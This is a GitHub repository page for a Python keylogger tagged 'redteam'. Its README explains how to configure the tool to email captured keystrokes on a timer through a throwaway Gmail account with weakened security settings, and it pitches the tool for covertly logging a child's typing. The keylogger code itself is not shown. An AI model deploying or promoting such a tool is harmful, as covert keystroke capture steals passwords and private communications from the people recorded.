Skip to content

MuratZamir/Keylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 

Repository files navigation

Keylogger

  • This local keylogger will come in handy while neighbor's annoying child is playing with your computer.

  • In order to run it locally, you have to make slight changes.

  • Just edit the "run_keylogger.py" file as shown below

    • my_keylogger = keylogger.Keylogger(enter time interval, "email address", "password")

    • ex. my_keylogger = keylogger.Keylogger(120, "[email protected]", "123qwe")

  • I recommend creating a throwaway Gmail account for this purpose. It's because you’ll have to adjust your Gmail account’s security settings to allow access from your Python code. Allow less secure apps to ON.

Run the program

python3 run_keylogger.py

About

redteam

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages